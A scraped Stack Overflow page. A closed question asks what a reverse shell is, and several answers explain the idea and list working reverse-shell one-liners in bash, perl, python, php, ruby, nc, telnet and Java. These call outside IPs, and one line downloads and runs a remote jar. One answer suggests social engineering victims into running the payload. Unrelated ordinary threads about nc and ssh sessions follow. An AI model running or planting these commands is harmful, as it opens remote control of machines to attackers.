What is a reverse shell? [closed] - shell

Closed. This question does not meet Stack Overflow guidelines. It is not currently accepting answers.
This question does not appear to be about a specific programming problem, a software algorithm, or software tools primarily used by programmers. If you believe the question would be on-topic on another Stack Exchange site, you can leave a comment to explain where the question may be able to be answered.
Closed last year.
The community reviewed whether to reopen this question last year and left it closed:
Original close reason(s) were not resolved
Improve this question
Could someone explain in deep what is reverse shell about and in what cases are we supposed to use it?
I found this http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet regarding the same, what is the meaning of:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

It's a(n insecure) remote shell introduced by the target. That's the opposite of a "normal" remote shell, that is introduced by the source.
Let's try it with localhost instead of 10.0.0.1:
Open two tabs in your terminal.
open TCP port 8080 and wait for a connection:
nc localhost -lp 8080
Open an interactive shell, and redirect the IO streams to a TCP socket:
bash -i >& /dev/tcp/localhost/8080 0>&1
where
bash -i "If the -i option is present, the shell is interactive."
>& "This special syntax redirects both, stdout and stderr to the specified target."
(argument for >&) /dev/tcp/localhost/8080 is a TCP client connection to localhost:8080.
0>&1 redirect file descriptor 0 (stdin) to fd 1 (stdout), hence the opened TCP socket is used to read input.
Cf. http://wiki.bash-hackers.org/syntax/redirection
Rejoice as you have a prompt in tab 1.
Now imagine not using localhost, but some remote IP.

In addition to the excellent answer by #Kay, the answer to your question why is it called reverse shell is because it is called reverse shell as opposed to a bind shell
Bind shell - attacker's machine acts as a client and victim's machine acts as a server opening up a communication port on the victim and waiting for the client to connect to it and then issue commands that will be remotely (with respect to the attacker) executed on the victim's machine. This would be only possible if the victim's machine has a public IP and is accessible over the internet (disregarding all firewall etc. for the sake of brevity).
Now what if the victim's machine is NATed and hence not directly reachable ? One possible solution - So what if the victim's machine is not reachable. My (attacker's) machine is reachable. So let me open a server at my end and let the victim connect to me. This is what a reverse shell is.
Reverse Shell - attacker's machine (which has a public IP and is reachable over the internet) acts as a server. It opens a communication channel on a port and waits for incoming connections. Victim's machine acts as a client and initiates a connection to the attacker's listening server.
This is exactly what is done by the following:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Examples of reverse shells in various languages. Danger is a word.
bash shell
bash -i >& /dev/tcp/1.1.1.1/10086 0>&1;
perl shell
perl -e 'use Socket;$i="1.1.1.1";$p=10086;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};';
python shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.1.1.1",10086));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);';
php shell
php -r '$sock=fsockopen("1.1.1.1",10086);exec("/bin/sh -i <&3 >&3 2>&3");';
ruby shell
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("1.1.1.1","10086");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end';
nc shell
nc -c /bin/sh 1.1.1.1 10086;
telnet shell
telnet 1.1.1.1 10086 | /bin/bash | telnet 1.1.1.1 10087; # Remember to listen on your machine also on port 4445/tcp
127.0.0.1; mknod test p ; telnet 1.1.1.1 10086 0<test | /bin/bash 1>test;
java jar shell
wget http://1.1.1.1:9999/revs.jar -O /tmp/revs1.jar;
java -jar /tmp/revs1.jar;
import java.io.IOException;
public class ReverseShell {
public static void main(String[] args) throws IOException, InterruptedException {
// TODO Auto-generated method stub
Runtime r = Runtime.getRuntime();
String cmd[]= {"/bin/bash","-c","exec 5<>/dev/tcp/1.1.1.1/10086;cat <&5 | while read line; do $line 2>&5 >&5; done"};
Process p = r.exec(cmd);
p.waitFor();
}
}

Reverse shell is getting the connection from the victim or target to your computer. You can think of, your computer (attacker) acts like a server and listens on port specified by him, now you make sure victim connects to you by sending syn packet ( depends on reverse shell implementation whether it is implemented using tcp or udp principals). Now connection appears as if victim himself intending to connect us.
Now in order to trick the victim you need to perform social engineering attacks or do dns spoofing and make sure your victim runs the program.
A successful reverse shell would bypass all firewalls - both host based and network based firewalls.
Reverse shell are of different types - tcp based or http based or reverse tcp based or udp based reverse shells.
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
To open a socket in Linux you have dev /tcp. You are basically opening tcp socket in Linux.
General format is /dev/tcp/ip address /port.
Now listen to port 8080 using net cat as
nc - l - p 8080 - - vv
A simple bash based reverse shell would be executing following command on the victim
nc - e /bin/bash 10.0.0.1 8080. It means you are asking vict to connect to your ip address on port 8080 assuming 10.0.0.1 is victims ip.

In general a reverse shell is a payload that functions as a shell to the operating system, this means means that it either uses the OS API directly, or indirectly through spawning shells in the background, to perform read / write operations on the target computer's memory and hardware. If you can get the payload on to the target computer and get them to execute it, it can connect to the attacker IP and spawn a thread that waits on the port for the attacker to send a command over some protocol like http; it then can parse the command and use the OS API to perform the operation and send status back to the attacker, or it could spawn a shell in the background with the command as a command line argument and redirect the output to a file, which it can then read and send back to the attacker.
The common example you see is the payload using the OS API to spawn a shell process and supplies a command line that opens a child shell and redirects the stdin / stdout of the shell itself to network sockets.

So how normal hacking works is you try to connect to your target and hack through there,
a reverse shell is when your target connects to the attacker by a payload or something alike
there is a good tutorial on network chuck
a reverse shell is also a basic form of rat

Related

How can I communicate with a unix socket using one connection in a bash script?

I want to read/write to a unix socket in a bash script, but only do it with one connection. All of the examples I've seen using nc say to open different socket connections for every read/write.
Is there a way to do it using one connection throughout the script for every read/write?
(nc only lets me communicate with the socket in a one shot manner)
Run the whole script with output redirected:
{
command
command
command
} | nc -U /tmp/cppLLRBT-socket
However, pipes are one-way, so you can do this for reading or writing, but not both.

where to send daemon optional output so it's readable

My daemon has option
-r WhereShouldIOutputAdditionalData
daemon is listening on port 26542 and writes on the same port , I want additional data to output to 26542 as well, I tried using
-r /dev/tcp/127.0.0.1/26542
and it doesn't work, When I do
> /dev/tcp/127.0.0.1/26542
I get connection refused. Deamon that I use: vowpal_wabbit, machine learning library.Any ideas?
Per an unoffical man page at
https://github.com/JohnLangford/vowpal_wabbit/wiki/Command-line-arguments
I see
-r [ --raw_predictions ] arg File to output unnormalized predictions to
So I think the -r argument is expecting a sort of /path/to/logs/raw_preds.log argument.
With this, you'll have "captured the optional output so it is readable." You could open a separate window and use the dev/admins old friend tail -f /path/to/logs/raw_preds.log to see info as it is written to the file.
If you really want it all to appear on one port, (which isn't exactly clear from your question), you'd need a separate program that can multi-plex the outputs, AND has control of your required port number. Also you'll need to be concerned about correct order of output.
IHTH.
I'm sorry, what you want to do it's impossibile for two reasons:
First, bash cannot listen on a given TCP port.
For example you cannot write a TCP server daemon in plain bash (you could use netcat for that), you can only connect() to a TCP port in bash.
Also, it is impossibile to listen on the same TCP ip:port that is already in LISTEN state by another process.

Not closing ssh

I have a korn 88 shell script which creates a folder on the remote host using the following command:
ssh $user#$host "mkdir -p $somedir" 2>> $Log
and after that transfers a bunch of files in a loop using this
scp -o keepalive=yes $somedir/$file $user#$host:$somedir
I wonder if first command will leave connection open after script ends?
Each of the commands opens and closes its own connection. It's easy to use a tool like tcpdump to verify this.
This is a consequence of the fact that the exit() system call used to terminate a process closes all open file descriptors including socket file descriptors. Closing a socket closes the connection behind the socket.
New-enough versions of ssh have the ability to multiplex several virtual connections over a single physical connection. So what you could do is start up some long-running ssh command in the background with connection multiplexing enabled, and then subsequent connections will re-use that connection with much faster startup times. See the manpage for ssh_config for info on connection multiplexing, relevant options are ControlMaster and ControlPath.
But as William Pursell suggests, rsync is probably easier and faster, if it's an option.

How to connect stdin of a list of commands (with pipes) to one of those commands

I need to give the user ability to send/receive messages over the network (using netcat) while the connection is stablished (the user, in this case, is using nc as client). The problem is that I need to send a line before user starts interacting. My first attempt was:
echo 'my first line' | nc server port
The problem with this approach is that nc closes the connection when echo finishes its execution, so the user can't send commands via stdin because the shell is given back to him (and also the answer from server is not received because it delays some seconds to start answering and, as nc closes the connection, the answer is never received by the user).
I also tried grouping commands:
{ echo 'my first line'; cat -; } | nc server port
It works almost the way I need, but if server closes the connection, it will wait until I press <ENTER> to give me the shell again. I need to get the shell back when the server closes the connection (in this case, the client - my nc command - will never closes the connection, except if I press Ctrl+C).
I also tried named pipes, without success.
Do you have any tip on how to do it?
Note: I'm using openbsd-netcat.
You probably want to look into expect(1).
It is cat that wait for the 'enter'.
You may write a script execute after nc to kill the cat and it will return to shell automatically.
You can try this to see if it works for you.
perl -e "\$|=1;print \"my first line\\n\" ; while (<STDIN>) {print;}" | nc server port
This one should produce the behaviour you want:
echo "Here is your MOTD." | nc server port ; nc server port
I would suggest you use cat << EOF, but I think it will not work as you expect.
I don't know how you can send EOF when the connection is closed.

Spawn subshell for SSH and continue with program flow

I'm trying to write a shell script that automates certain startup tasks based on my location (home/campusA/campusB). I go to University and take classes in two different campuses (hence campusA/campusB). My location is determined by which wireless network I'm connected to. For the purposes of this script, we can assume that I will be connected to one of these networks when the script is called and my script knows which one I'm connected to based on a call to iwconfig.
This is what I want it to do:
cat file1 > file2 # always do this, regardless of where I am
if Im at home:
start tweetdeck, thunderbird, skype
else if Im at campusA:
activate the login script # I need to login on a webform before I get internet access.
# I have written a script to automate this.
# Wait for this script to finish before doing anything else
myProg2 & # I want myProg2 running in the background until I shutdown my computer.
else if Im at campusB:
ssh username#domain # this is the problematic line
myProg2 & # I want myProg2 running in the background until I shutdown my computer.
start tweetdeck, thunderbird
close the terminal with the "exit" command
The problem is that campusB's wireless network is behind a firewall, which grants me internet access ONLY after I successfully ssh by username#domain. After a successful ssh, I need to keep the terminal window active in order to hold keep the internet access. If I close the terminal window, I lose internet access (this is bad).
When I try doing just ssh username#domain, the script stops because I don't exit the ssh command. I can't ^C out of it, which means that the rest of the script is never executed. I also have the same problem if I just close the terminal window in an attempt to kill the ssh session.
Some googling brought me to subshell, which I'm either using wrong or can't use to solve my problem. So how should I go about solving this problem? I'd appreciate any help - I've been at this for a while now and am unable to find anything helpful. If it makes a difference, I'd rather not store my ssh password in the script
Further, ampersanding the ssh call (ssh username#domain &) doesn't seem to do any good (can anyone explain why?)
Thank you in advance
EDIT
I must clarify, that the ssh connection has to be active in order for me to have internet access. Thus, when I close the terminal window, I need the ssh connection to still be active.
I had a script that looped on 6 servers, calling via ssh in the background. In 1 part of the script, there was a mis-behaving vendor application; the application didn't 'let go' of the connection properly. (other parts of the script using ssh in background worked fine).
I found that using ssh -t -t cured the problem. Maybe this can help you too.
(a teammate found this on the web, and we had spent so much time, I never went back to read the article that suggested this. The man page on our system gave no hint that such a thing was possible)
Hope this helps.
You may want to try to double background myProg2 to detach it from the tty:
# cf. "Wizard Boot Camp, Part Six: Daemons & Subshells",
# http://www.linux-mag.com/id/5981
(myProg2 &) &
Another option may be to use the daemon tool from the libslack package:
http://ingvar.blog.linpro.no/2009/05/18/todays-sysadmin-tip-using-libslack-daemon-to-daemonize-a-script/
Having a ssh with pseudy tty on background shell
In addition to #shellter's answer, I would like make some precision:
where #shelter said:
The man page on our system gave no hint that such a thing was possible
On my system (Debian 7 GNU/Linux), if I hit:
man -Pcol\ -b ssh| grep -A3 '^ *-t '
I could read:
-t Force pseudo-tty allocation. This can be used to execute arbi‐
trary screen-based programs on a remote machine, which can be
very useful, e.g. when implementing menu services. Multiple -t
options force tty allocation, even if ssh has no local tty.
Yes: Multiple -t options force tty allocation, even if ssh has no local tty.
This mean: If you remotely run a tool that require access to pseudo terminal ( pty like /dev/pts/0), you could run them by using -t switch.
But this would work only if ssh is run from a shell console (aka having his own pty). If you plan to run them is shell session without console, like background scripts, you may use Multiple -t to enforce pseudo tty allocation from ssh.
Multiple ssh shell on one ssh connection
In addition to answers from #tommy and #geekosaur, I would make some precision:
#tommy point to a very intersting feature of ssh. Not sure this have a lot to do with answer, but speaking around long time connection, this feature has to be clearly understood.
Once a connection is established, ssh could (and know how to) use them to drive a lot of thing in this one connection:
-L let you drive remote TCP connections to local machines/network. (full syntax is: -L localip:localport:distip:distport) where localip could be specified to permit other hosts from same local domain to access same tcp bind, and distip could by any host from distant network ( not only localhost ) sample: -L192.168.1.31:8443:google.com:443 permit any host from local domain to reach google through your host: http://192.168.1.31:8443
-R Same remarks in reverse way!
-M Tell ssh to open a local unix socket for bindind next ssh consoles. Simply open two terminal window. First in both window, hit: ssh somewhere than hit netstat -tan | grep :22 or netstat -tan | grep 192.168.1.31:22 (assuming 192.168.1.31 is your onw host's ip)
Than compare close all your ssh session and in first terminal, hit: ssh -M somewhere and in second, simply ssh somewhere. you may see in second terminal:
$ ssh somewhere
+ ssh somewhere
Last login: Mon Feb 3 08:58:01 2014 from elsewhere
If now you hit netstat -tan | grep 192.168.1.31:22 (on any of two oppened ssh session;) you must see that there is only one tcp connection.
This kind of features could be used in combination with -L and maybe some sleep 86399...
To work around a tcp killer router that close every inactive TCP connection from more than 120 seconds, I run:
ssh -M somewhere 'while :;do uptime;sleep 60;done'
This ensure connection stay up even if I dont hit a key for more than two minutes.
Here's a few thoughts that might help.
Sub-shells
Sub-shells fork new processes, but don't return control to the calling shell. If you want to fork a sub-shell to do the work for you, then you'll need to append a & to the line.
(ssh username#domain) &
But this doesn't look like a compelling reason to use a sub-shell. If you had a number commands you wanted to execute in order from each other, yet in parallel from the calling shell, then maybe it would be worth it. For example...
(dothis.sh; thenthis.sh; andthislastthingtoo.sh) &
Forking
I'm not sure why & isn't working for you, but it may be worth looking into nohup as well. This makes the command "immune" to hang up signals.
nohup ssh username#domain (try with and without the & at the end)
Passwords
Not storing passwords in the script is essential for any ssh automation. You can accomplish that using public key cryptography which is an inherent feature of ssh. I wont go into the details here because there are a number of great resources all across the interwebs on setting this up. I strongly suggest investigating this further.
HOWTO: set up ssh keys - Paul Keck, 2001
SSH Keys - archlinux.org
SSH with authentication key instead of password - Debian Administration
Secure Shell - Wikipedia, the free encyclopedia
If you do go this route, I also suggest running ssh in "batch mode" which will disable password querying and will automatically disconnect from the server if it becomes unresponsive after 5 minutes.
ssh -o 'BatchMode=yes' username#domain
Persistence
Then if you want to persist the connection, run some silly loop in bash! :)
ssh -o 'BatchMode=yes' username#domain "while (( 1 == 1 )); do sleep 60; done"
The problem with & is that ssh loses access to its standard input (the terminal), so when it goes to read something to send to the other side it either gets an error and exits, or is killed by the system with SIGTTIN which will implicitly suspend it. The -n and -f options are used to deal with this: -n tells it not to use standard input, -f tells it to set up any necessary tunnels etc., then close the terminal stream.
So the best way to do this is probably to do
ssh -L 9999:localhost:9999 -f host & # for some random unused port
and then manually kill the ssh before logout. Alternately,
ssh -L 9999:localhost:9999 -n host 'while :; do sleep 86400; done' </dev/null &
(The redirection is to make sure the SIGTTIN doesn't happen anyway.)
While you're at it, you may want to save the process ID and shut it down from your .logout/.bash_logout:
ssh -L 9999:localhost:9999 -n host 'while :; do sleep 86400; done' < /dev/null & echo $! >~.ssh_pid; chmod 0600 ~/.ssh_pid
and in .bash_logout:
if test -f ~/.ssh_pid; then
set -- $(sed -n 's/^\([0-9][0-9]*\)$/\1/p' ~/.ssh_pid)
if [ $# = 1 ]; then
kill $1 >/dev/null 2>&1
fi
rm ~/.ssh_pid
fi
The extra code there attempts to avoid someone sabotaging your ~/.ssh_pid, because I'm a professional paranoid.
(Code untested and may have typoes)
It's been a while since I've used ssh, and I can't test it right now, but have you tried the -f switch?
ssh -f username#domain
The man page says it backgrounds ssh. Not sure why & wouldn't work, but I guess it's interpreting it as a command to be run on the remote machine.
Maybe screen + ssh would fit the bill as well?
Something like:
screen -d -m -S sessionName cmd
screen -d -m -S sessionName cmd &
# reconnect with
screen -r sessionName

Resources